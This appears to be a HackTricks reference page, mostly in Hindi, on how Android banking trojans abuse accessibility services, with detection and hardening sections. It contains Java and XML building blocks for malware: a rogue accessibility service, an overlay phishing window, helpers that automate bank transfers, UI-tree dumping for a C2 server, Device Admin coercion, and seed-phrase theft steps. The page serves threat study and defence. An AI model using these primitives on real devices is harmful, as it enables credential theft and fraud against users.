16 KiB
Android Accessibility Service Abuse
{{#include ../../banners/hacktricks-training.md}}
अवलोकन
AccessibilityService
को विकलांगताओं वाले उपयोगकर्ताओं को Android डिवाइस के साथ इंटरैक्ट करने में मदद करने के लिए बनाया गया था। दुर्भाग्य से, वही powerful automation APIs (global navigation, text input, gesture dispatch, overlay windows…) मालवेयर द्वारा हथियारबंद किए जा सकते हैं ताकि बिना रूट अनुमतियों के हैंडसेट पर complete remote control हासिल किया जा सके।
आधुनिक Android बैंकिंग ट्रोजन और Remote-Access-Trojans (RATs) जैसे PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda और कई अन्य समान नुस्खा अपनाते हैं:
- Social-engineer कर के पीड़ित को एक rogue accessibility service सक्षम करने के लिए प्रेरित करना (the BIND_ACCESSIBILITY_SERVICE permission को "high-risk" माना जाता है और इसके लिए उपयोगकर्ता की स्पष्ट क्रिया आवश्यक होती है)।
- सेवा का उपयोग करके
- स्क्रीन पर दिखाई देने वाले हर UI इवेंट और टेक्स्ट को कैप्चर करना,
- सिंथेटिक gestures (
dispatchGesture
) और global actions (performGlobalAction
) इंजेक्ट करके ऑपरेटर की इच्छित किसी भी कार्य को ऑटोमेट करना, - वैध apps के ऊपर full-screen overlays खींचना TYPE_ACCESSIBILITY_OVERLAY window type का उपयोग करके (कोई
SYSTEM_ALERT_WINDOW
prompt नहीं!), - पीड़ित की ओर से सिस्टम डायलॉग्स पर क्लिक करके अतिरिक्त runtime permissions चुपके से_GRANTED_ करना।
- डेटा को एक्सफिल्ट्रेट करना या उपयोगकर्ता एक बिल्कुल सामान्य स्क्रीन देख रहे होने के दौरान रीयल-टाइम में On-Device-Fraud (ODF) करना।
अनुमति का अनुरोध
<!-- AndroidManifest.xml -->
<service
android:name="com.evil.rat.EvilService"
android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
android:exported="false">
<intent-filter>
<action android:name="android.accessibilityservice.AccessibilityService" />
</intent-filter>
<meta-data android:name="android.accessibilityservice"
android:resource="@xml/evil_accessibility_config"/>
</service>
सहायक XML यह परिभाषित करता है कि नकली डायलॉग कैसा दिखेगा:
<?xml version="1.0" encoding="utf-8"?>
<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
android:description="@string/service_description"
android:accessibilityEventTypes="typeAllMask"
android:accessibilityFeedbackType="feedbackGeneric"
android:notificationTimeout="200"
android:canPerformGestures="true"
android:canRetrieveWindowContent="true"/>
दूरस्थ UI ऑटोमेशन मूलभूत तत्व
public class EvilService extends AccessibilityService {
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
// harvest text or detect foreground app change
}
// Simulate HOME / BACK / RECENTS …
private void navHome() { performGlobalAction(GLOBAL_ACTION_HOME); }
private void navBack() { performGlobalAction(GLOBAL_ACTION_BACK); }
private void openRecents() { performGlobalAction(GLOBAL_ACTION_RECENTS); }
// Generic tap / swipe
public void tap(float x, float y) {
Path p = new Path(); p.moveTo(x, y);
GestureDescription.StrokeDescription s = new GestureDescription.StrokeDescription(p, 0, 50);
dispatchGesture(new GestureDescription.Builder().addStroke(s).build(), null, null);
}
}
केवल इन दो APIs के साथ एक हमलावर कर सकता है:
- स्क्रीन अनलॉक करना, बैंकिंग ऐप खोलना, इसके UI tree में नेविगेट करना और एक ट्रांसफर फॉर्म सबमिट करना।
- उभरने वाली हर permission dialog को स्वीकार करना।
- Play Store intent के माध्यम से अतिरिक्त APKs इंस्टॉल/अपडेट करना।
दुरुपयोग पैटर्न
1. Overlay Phishing (Credential Harvesting)
एक पारदर्शी या अपारदर्शी WebView
विंडो मैनेजर में जोड़ा जाता है:
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
TYPE_ACCESSIBILITY_OVERLAY, // ⬅ bypasses SYSTEM_ALERT_WINDOW
FLAG_NOT_FOCUSABLE | FLAG_NOT_TOUCH_MODAL, // touches still reach the real app
PixelFormat.TRANSLUCENT);
wm.addView(phishingView, lp);
The victim fake फॉर्म में credentials टाइप करता है जबकि बैकग्राउंड app वही gestures रिसीव कर रहा होता है — कोई संदिग्ध "draw over other apps" prompt कभी दिखाई नहीं देता।
Detailed example: the Accessibility Overlay Phishing section inside the Tapjacking page.
2. On-Device Fraud automation
Malware families such as PlayPraetor एक persistent WebSocket चैनल बनाए रखते हैं जहाँ operator high-level commands (init
, update
, alert_arr
, report_list
, …) जारी कर सकता है। यह सर्विस उन commands को ऊपर बताए low-level gestures में ट्रांसलेट करती है, जिससे real-time unauthorized transactions संभव होते हैं जो उस डिवाइस से जुड़ी multi-factor-authentication को आसानी से bypass कर लेते हैं।
3. Screen streaming & monitoring
By combining the MediaProjection API with an RTMP client library, the RAT live framebuffer को rtmp://<c2>:1935/live/<device_id>
पर ब्रॉडकास्ट कर सकता है, जिससे adversary को perfect situational awareness मिलती है जबकि Accessibility engine UI ड्राइव करती है।
PlayPraetor – command & control workflow
- HTTP(S) heartbeat – hard-coded list पर iterate करें जब तक कोई domain
POST /app/searchPackageName
के साथ active C2 बताकर जवाब न दे। - WebSocket (port 8282) – द्वि-मार्गी JSON commands:
update
– नए conf/APKs पुश करेंalert_arr
– overlay templates कॉन्फ़िगर करेंreport_list
– targeted package names की सूची भेजेंheartbeat_web
– keep-alive
- RTMP (port 1935) – लाइव स्क्रीन/वीडियो स्ट्रीमिंग।
- REST exfiltration –
/app/saveDevice
(fingerprint)/app/saveContacts
|/app/saveSms
|/app/uploadImageBase64
/app/saveCardPwd
(bank creds)
The AccessibilityService वह लोकल इंजन है जो उन क्लाउड commands को physical interactions में बदलता है।
Detecting malicious accessibility services
adb shell settings get secure enabled_accessibility_services
- Settings → Accessibility → Downloaded services – उन apps की तलाश करें जो Google Play से नहीं हैं।
- MDM / EMM solutions
ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY
(Android 13+) लागू कर सकते हैं ताकि sideloaded services ब्लॉक हो सकें। - चल रही सर्विसेज़ का विश्लेषण करें:
adb shell dumpsys accessibility | grep "Accessibility Service"
Hardening recommendations for app developers
- संवेदनशील views को
android:accessibilityDataSensitive="accessibilityDataPrivateYes"
(API 34+) के साथ मार्क करें। setFilterTouchesWhenObscured(true)
कोFLAG_SECURE
के साथ मिलाएँ ताकि tap/overlay hijacking रोका जा सके।- ओवरले का पता लगाने के लिए
WindowManager.getDefaultDisplay().getFlags()
याViewRootImpl
API को पोल करें। - तब ऑपरेट करने से इनकार करें जब
Settings.canDrawOverlays()
या कोई गैर-विश्वसनीय Accessibility service सक्रिय हो।
ATS automation cheat-sheet (Accessibility-driven)
Malware केवल Accessibility APIs के साथ एक bank app को पूरी तरह ऑटोमेट कर सकता है। Generic primitives:
// Helpers inside your AccessibilityService
private List<AccessibilityNodeInfo> byText(String t){
AccessibilityNodeInfo r = getRootInActiveWindow();
return r == null ? Collections.emptyList() : r.findAccessibilityNodeInfosByText(t);
}
private boolean clickText(String t){
for (AccessibilityNodeInfo n: byText(t)){
if (n.isClickable()) return n.performAction(ACTION_CLICK);
AccessibilityNodeInfo p = n.getParent();
if (p != null) return p.performAction(ACTION_CLICK);
}
return false;
}
private void inputText(AccessibilityNodeInfo field, String text){
Bundle b = new Bundle(); b.putCharSequence(ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
field.performAction(ACTION_SET_TEXT, b);
}
private void tap(float x, float y){
Path p = new Path(); p.moveTo(x,y);
dispatchGesture(new GestureDescription.Builder()
.addStroke(new GestureDescription.StrokeDescription(p,0,40)).build(), null, null);
}
उदाहरण प्रवाह (Czech → English लेबल):
- "Nová platba" (नया भुगतान) → क्लिक करें
- "Zadat platbu" (भुगतान दर्ज करें) → क्लिक करें
- "Nový příjemce" (नया प्राप्तकर्ता) → क्लिक करें
- "Domácí číslo účtu" (घरेलू खाता संख्या) → फ़ोकस करें और
ACTION_SET_TEXT
- "Další" (अगला) → क्लिक करें → … "Zaplatit" (भुगतान) → क्लिक करें → PIN दर्ज करें
Fallback: कस्टम widgets के कारण text lookup विफल होने पर hard-coded coordinates के साथ dispatchGesture
का उपयोग।
दिखा गया: ट्रांसफर से पहले limits UI पर जाकर दैनिक लिमिट बढ़ाने के लिए check_limit
और limit
के प्री-स्टेप्स।
Text-based pseudo-screen streaming
कम-लेटेंसी रिमोट कंट्रोल के लिए, पूर्ण वीडियो स्ट्रीमिंग की बजाय, वर्तमान UI tree का टेक्स्टुअल प्रतिनिधित्व डंप करें और इसे बार-बार C2 पर भेजें।
private void dumpTree(AccessibilityNodeInfo n, String indent, StringBuilder sb){
if (n==null) return;
Rect b = new Rect(); n.getBoundsInScreen(b);
CharSequence txt = n.getText(); CharSequence cls = n.getClassName();
sb.append(indent).append("[").append(cls).append("] ")
.append(txt==null?"":txt).append(" ")
.append(b.toShortString()).append("\n");
for (int i=0;i<n.getChildCount();i++) dumpTree(n.getChild(i), indent+" ", sb);
}
यह txt_screen
(एक-बार) और screen_live
(लगातार) जैसे कमांड्स का आधार है।
Device Admin जबरन नियंत्रण की मूल क्रियाएँ
एक बार Device Admin receiver सक्रिय हो जाने पर, ये कॉल्स credentials capture करने और नियंत्रण बनाए रखने के अवसर बढ़ा देती हैं:
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);
ComponentName admin = new ComponentName(this, AdminReceiver.class);
// 1) Immediate lock
dpm.lockNow();
// 2) Force credential change (expire current PIN/password)
dpm.setPasswordExpirationTimeout(admin, 1L); // may require owner/profile-owner on recent Android
// 3) Disable biometric unlock to force PIN/pattern entry
int flags = DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS;
dpm.setKeyguardDisabledFeatures(admin, flags);
नोट: इन नीतियों की सटीक उपलब्धता Android version और OEM के अनुसार भिन्न होती है; परीक्षण के दौरान device policy role (admin vs owner) को सत्यापित करें।
Crypto wallet seed-phrase extraction patterns
MetaMask, Trust Wallet, Blockchain.com और Phantom के लिए देखे गए फ्लो:
- चोरी किए गए PIN (captured via overlay/Accessibility) या प्रदान किए गए wallet password से अनलॉक करें।
- नेविगेट: Settings → Security/Recovery → Reveal/Show recovery phrase.
- टेक्स्ट नोड्स की keylogging, secure-screen bypass, या जब टेक्स्ट छिपा हो तो screenshot OCR के माध्यम से phrase को इकट्ठा करें।
- selectors को स्थिर करने के लिए multiple locales (EN/RU/CZ/SK) का सपोर्ट — उपलब्ध होने पर
viewIdResourceName
पसंद करें, नहीं तो multilingual text matching पर fallback करें।
NFC-relay orchestration
Accessibility/RAT modules तीसरे स्टेज के रूप में एक dedicated NFC-relay app (e.g., NFSkate) इंस्टॉल और लॉन्च कर सकते हैं और victim को card-present relay steps के माध्यम से मार्गदर्शन करने के लिए एक overlay guide भी inject कर सकते हैं।
पृष्ठभूमि और TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
References
- PlayPraetor’s evolving threat: How Chinese-speaking actors globally scale an Android RAT
- Android accessibility documentation – Automating UI interaction
- The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)
- GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)
{{#include ../../banners/hacktricks-training.md}}